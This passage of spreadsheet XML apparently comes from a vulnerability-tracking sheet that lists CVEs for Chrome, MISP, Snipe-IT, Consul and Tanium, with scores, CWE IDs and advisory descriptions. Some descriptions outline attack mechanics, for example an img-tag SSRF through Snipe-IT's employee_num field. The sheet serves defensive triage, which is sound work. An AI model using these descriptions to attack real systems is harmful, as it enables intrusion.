      <c r="M1683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85211</t>
        </is>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85538</t>
        </is>
      </c>
      <c r="C1684" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1684" s="5" t="inlineStr"/>
      <c r="F1684" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1684" s="5" t="inlineStr"/>
      <c r="H1684" s="5" t="inlineStr"/>
      <c r="I1684" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1684" s="5" t="inlineStr"/>
      <c r="K1684" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1684" s="5" t="inlineStr">
        <is>
          <t>An incorrect authorization vulnerability in MISP allowed authenticated users to delete attributes from events despite lacking the required perm_modify or perm_modify_org permissions.
The affected attribute deletion paths relied on organization membership checks performed by MispAttribute::deleteAttribute() but did not consistently enforce MISP's event modification authorization rules. Consequently, a user belonging to the organization associated with an event could potentially delete individual attributes or perform bulk attribute deletion even when their assigned role was not authorized to modify the event.
This created an inconsistency between attribute editing and deletion: editing an attribute correctly used MISP's ACL::canModifyEvent() authorization logic, whereas the affected deletion operations could bypass these permission checks.
An authenticated attacker with access to an affected MISP instance and membership in the organization owning an event could exploit this flaw to remove attributes from that event, potentially causing unauthorized modification or loss of threat intelligence data.
The patch introduces a common authorization check for all affected deletion paths. Before deletion, MISP now resolves the associated events and verifies that the current user is authorized to modify each event using the same authorization mechanism used by normal event and attribute modification operations.</t>
        </is>
      </c>
      <c r="M1684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85538</t>
        </is>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86750</t>
        </is>
      </c>
      <c r="C1685" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1685" s="5" t="inlineStr"/>
      <c r="F1685" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1685" s="5" t="inlineStr"/>
      <c r="H1685" s="5" t="inlineStr"/>
      <c r="I1685" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1685" s="5" t="inlineStr"/>
      <c r="K1685" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1685" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not validate company assignment authorization before persisting user records via the REST API. In Api\UsersController::store() and ::update(), the user record is filled from the request and saved before the requested company_id / company_ids[] values are filtered against the actor's permitted companies (Company::getIdsForCurrentUser()). On installs using Full Multiple Companies Support (FMCS), a non-superuser holding users.create (or users.edit on a target user) can submit company identifiers for companies outside their scope — including a mix of permitted and foreign ids — causing the account row to be committed to the database before authorization is checked. Where null_company_is_floater=1 is set, the post-hoc filter leaves an empty company pivot and the account is persisted as a "floater" with cross-company visibility, allowing creation or relocation of user accounts across tenant boundaries.</t>
        </is>
      </c>
      <c r="M1685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86750</t>
        </is>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="C1686" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1686" s="5" t="inlineStr"/>
      <c r="F1686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1686" s="5" t="inlineStr"/>
      <c r="H1686" s="5" t="inlineStr"/>
      <c r="I1686" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1686" s="5" t="inlineStr"/>
      <c r="K1686" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1686" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="M1686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="C1687" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1687" s="5" t="inlineStr"/>
      <c r="F1687" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1687" s="5" t="inlineStr"/>
      <c r="H1687" s="5" t="inlineStr"/>
      <c r="I1687" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1687" s="5" t="inlineStr"/>
      <c r="K1687" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1687" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M1687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87090</t>
        </is>
      </c>
      <c r="C1688" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1688" s="5" t="inlineStr"/>
      <c r="F1688" s="5" t="inlineStr"/>
      <c r="G1688" s="5" t="inlineStr"/>
      <c r="H1688" s="5" t="inlineStr"/>
      <c r="I1688" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1688" s="5" t="inlineStr"/>
      <c r="K1688" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1688" s="5" t="inlineStr">
        <is>
          <t>Consul and Consul Enterprise are vulnerable to an authorization bypass in the catalog node-write path that may allow an authenticated attacker to delete another node's catalog registration and take over its node identity. An attacker with a token granting node-write permission on any single node name may exploit this issue if they can obtain the node ID of a node they do not control. This vulnerability (CVE-2026-87090) is fixed in Consul 2.0.4 and Consul Enterprise 1.21.18, 1.22.12 and 2.0.4.</t>
        </is>
      </c>
      <c r="M1688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87090</t>
        </is>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87479</t>
        </is>
      </c>
      <c r="C1689" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1689" s="5" t="inlineStr"/>
      <c r="F1689" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1689" s="5" t="inlineStr"/>
      <c r="H1689" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1689" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1689" s="5" t="inlineStr"/>
      <c r="K1689" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L1689" s="5" t="inlineStr">
        <is>
          <t>Insufficient policy enforcement in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87479</t>
        </is>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87480</t>
        </is>
      </c>
      <c r="C1690" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1690" s="5" t="inlineStr"/>
      <c r="F1690" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1690" s="5" t="inlineStr"/>
      <c r="H1690" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1690" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1690" s="5" t="inlineStr"/>
      <c r="K1690" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1690" s="5" t="inlineStr">
        <is>
          <t>Use after free in Printing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87480</t>
        </is>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87481</t>
        </is>
      </c>
      <c r="C1691" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1691" s="5" t="inlineStr"/>
      <c r="F1691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1691" s="5" t="inlineStr"/>
      <c r="H1691" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I1691" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1691" s="5" t="inlineStr"/>
      <c r="K1691" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1691" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87481</t>
        </is>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87487</t>
        </is>
      </c>
      <c r="C1692" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1692" s="5" t="inlineStr"/>
      <c r="F1692" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1692" s="5" t="inlineStr"/>
      <c r="H1692" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1692" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1692" s="5" t="inlineStr"/>
      <c r="K1692" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1692" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87487</t>
        </is>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87506</t>
        </is>
      </c>
      <c r="C1693" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1693" s="5" t="inlineStr"/>
      <c r="F1693" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1693" s="5" t="inlineStr"/>
      <c r="H1693" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1693" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1693" s="5" t="inlineStr"/>
      <c r="K1693" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L1693" s="5" t="inlineStr">
        <is>
          <t>Privilege elevation in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87506</t>
        </is>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87510</t>
        </is>
      </c>
      <c r="C1694" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1694" s="5" t="inlineStr"/>
      <c r="F1694" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1694" s="5" t="inlineStr"/>
      <c r="H1694" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1694" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1694" s="5" t="inlineStr"/>
      <c r="K1694" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1694" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87510</t>
        </is>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87524</t>
        </is>
      </c>
      <c r="C1695" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1695" s="5" t="inlineStr"/>
      <c r="F1695" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1695" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1695" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1695" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1695" s="5" t="inlineStr"/>
      <c r="K1695" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1695" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87524</t>
        </is>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87553</t>
        </is>
      </c>
      <c r="C1696" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1696" s="5" t="inlineStr"/>
      <c r="F1696" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1696" s="5" t="inlineStr"/>
      <c r="H1696" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1696" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1696" s="5" t="inlineStr"/>
      <c r="K1696" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1696" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87553</t>
        </is>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87572</t>
        </is>
      </c>
      <c r="C1697" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1697" s="5" t="inlineStr"/>
      <c r="F1697" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1697" s="5" t="inlineStr"/>
      <c r="H1697" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1697" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1697" s="5" t="inlineStr"/>
      <c r="K1697" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1697" s="5" t="inlineStr">
        <is>
          <t>Injection in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87572</t>
        </is>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87578</t>
        </is>
      </c>
      <c r="C1698" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1698" s="5" t="inlineStr"/>
      <c r="F1698" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1698" s="5" t="inlineStr"/>
      <c r="H1698" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1698" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1698" s="5" t="inlineStr"/>
      <c r="K1698" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1698" s="5" t="inlineStr">
        <is>
          <t>Use after free in Receiver in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87578</t>
        </is>
      </c>
    </row>
    <row r="1699">
      <c r="A1699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87582</t>
        </is>
      </c>
      <c r="C1699" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1699" s="5" t="inlineStr"/>
      <c r="F1699" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1699" s="5" t="inlineStr"/>
      <c r="H1699" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1699" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1699" s="5" t="inlineStr"/>
      <c r="K1699" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="L1699" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87582</t>
        </is>
      </c>
    </row>
    <row r="1700">
      <c r="A1700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87604</t>
        </is>
      </c>
      <c r="C1700" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1700" s="5" t="inlineStr"/>
      <c r="F1700" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1700" s="5" t="inlineStr"/>
      <c r="H1700" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1700" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1700" s="5" t="inlineStr"/>
      <c r="K1700" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1700" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87604</t>
        </is>
      </c>
    </row>
    <row r="1701">
      <c r="A1701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87616</t>
        </is>
      </c>
      <c r="C1701" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1701" s="5" t="inlineStr"/>
      <c r="F1701" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1701" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1701" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1701" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1701" s="5" t="inlineStr"/>
      <c r="K1701" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="L1701" s="5" t="inlineStr">
        <is>
          <t>Improper initialization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M1701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87616</t>
        </is>
      </c>
    </row>
    <row r="1702">
      <c r="A1702" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87618</t>
        </is>
      </c>
      <c r="C1702" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1702" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1702" s="5" t="inlineStr"/>
      <c r="F1702" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1702" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1702" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1702" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1702" s="5" t="inlineStr"/>
      <c r="K1702" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L1702" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Storage in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87618</t>
        </is>
      </c>
    </row>
    <row r="1703">
      <c r="A1703" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87628</t>
        </is>
      </c>
      <c r="C1703" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1703" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1703" s="5" t="inlineStr"/>
      <c r="F1703" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1703" s="5" t="inlineStr"/>
      <c r="H1703" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1703" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1703" s="5" t="inlineStr"/>
      <c r="K1703" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1703" s="5" t="inlineStr">
        <is>
          <t>Use after free in Cast in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="M1703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87628</t>
        </is>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87639</t>
        </is>
      </c>
      <c r="C1704" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1704" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1704" s="5" t="inlineStr"/>
      <c r="F1704" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1704" s="5" t="inlineStr"/>
      <c r="H1704" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1704" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1704" s="5" t="inlineStr"/>
      <c r="K1704" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1704" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebPackaging in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87639</t>
        </is>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87644</t>
        </is>
      </c>
      <c r="C1705" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="D1705" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1705" s="5" t="inlineStr"/>
      <c r="F1705" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1705" s="5" t="inlineStr">
        <is>
